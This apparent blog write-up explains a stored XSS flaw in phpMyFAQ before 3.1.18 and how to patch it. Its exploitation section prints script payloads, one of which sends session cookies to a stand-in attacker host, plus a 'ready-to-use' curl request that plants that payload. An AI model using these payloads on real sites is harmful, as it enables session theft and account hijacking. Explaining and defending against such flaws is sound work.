CVE-2023-5319 - Stored Cross-site Scripting (XSS) Vulnerability in phpMyFAQ Before 3.1.18 – Analysis and Exploitation

Security researchers discovered a critical vulnerability, CVE-2023-5319, in the open-source FAQ web application phpMyFAQ. Before version 3.1.18, phpMyFAQ is affected by a stored Cross-site Scripting (XSS) vulnerability. This vulnerability allows attackers to store malicious scripts in the database, which will then be executed in users’ browsers, allowing for session theft, redirection to phishing pages, or executing actions while impersonating the victim.

This post breaks down CVE-2023-5319: how it works, why it’s dangerous, and how a simple payload can exploit it. All details are presented in plain, easy-to-understand language, along with code samples and links to official sources.

What is phpMyFAQ?

phpMyFAQ is a widely-used, open-source software that allows organizations to maintain web-based Frequently Asked Questions (FAQs). It is built using PHP and a back-end database (MySQL, PostgreSQL, etc). Many websites use phpMyFAQ to provide self-service resources to users.

What is Stored XSS?

Cross-site scripting (XSS) is a vulnerability allowing attackers to inject malicious scripts into web pages viewed by users. Stored XSS means the code is saved (persisted) in the database or on the server, so every user who views the affected page will be exposed.

Where is the Vulnerability?

In phpMyFAQ versions *prior to 3.1.18*, there is insufficient sanitization of user-supplied data when adding new FAQ entries (e.g., the "Question" or "Answer" fields). This means that an attacker can submit a new FAQ that includes a script tag or JavaScript code, which will be stored in the database and shown on the public FAQ page—executing as soon as someone visits.

Relevant reference:
- GitHub Security Advisory
- NVD Entry for CVE-2023-5319

How Does the Exploit Work?

The attacker fills out a form to submit a new FAQ entry or edits an existing one, inserting a script as part of the content. When the admin approves entry (or in some configurations even before), every user who visits the FAQ page with that entry will have the script run in their browser context.

Log in or access the “Add New Question” Form

In many phpMyFAQ setups, anonymous users or registered users can submit new questions or answers using a public-facing form.

In the “Question” or “Answer” field, the attacker adds a script payload.

<script>alert('XSS by CVE-2023-5319');</script>

Or, a more dangerous payload could steal the user's session cookie

<script>
fetch('https://evil.example.com/cookie?c='+document.cookie);
</script>

Submission

Submit the FAQ entry via the web form. Depending on site settings, the entry might be visible immediately, or after admin approval.

Trigger

Any user visiting the FAQ section containing this question/answer will unknowingly execute the attacker's script with their browser privileges.

Form submission data

Question: How do I reset my password? <script>alert('CVE-2023-5319 XSS');</script>
Answer: You can reset your password by clicking 'Forgot Password' on the login page.

After submission and display

<div class="faq-question">
    How do I reset my password? <script>alert('CVE-2023-5319 XSS');</script>
</div>

When anyone visits the FAQ page, the browser shows

> An alert box with the message: “CVE-2023-5319 XSS”

Account Hijacking: If the script reads session cookies or tokens.

- Phishing: Redirect users to malicious sites, e.g. window.location='https://evil.example.com';;

Defacement: Replace FAQ content or inject unwanted HTML.

- Further Exploitation: The attacker might use JavaScript to interact with sensitive site features the victim can access.

Here’s a ready-to-use POST request to exploit the form (example with curl)

curl -X POST https://site.example.com/index.php?action=add \
  -d "question=Test XSS <script>fetch('https://evil.example.com/?c='+document.cookie)</script>" \
  -d "answer=Normal answer text..."

> Replace the URL and form parameters with those matching the vulnerable phpMyFAQ instance.

Mitigation

Upgrade immediately:
The phpMyFAQ team patched this issue in 3.1.18.

- Official Patch PR

Other solutions

- Use strict input sanitization and/or output encoding functions.
- Use modern frameworks/ORMs with built-in XSS protection.

References

- GitHub Security Advisory for CVE-2023-5319
- National Vulnerability Database Entry
- phpMyFAQ Official Site

Conclusion

CVE-2023-5319 demonstrates how a simple oversight—forgetting to sanitize user input—can lead to serious security issues in widely used software. If you use phpMyFAQ, update now. Stored XSS is easy to exploit and very risky for end users.

If you want to test your system, never use real data or attack production sites without authorization. For security teams, regular updates and code reviews are key to defending against vulnerabilities like CVE-2023-5319.

Timeline

Published on: 09/30/2023 01:15:00 UTC
Last modified on: 10/02/2023 20:13:00 UTC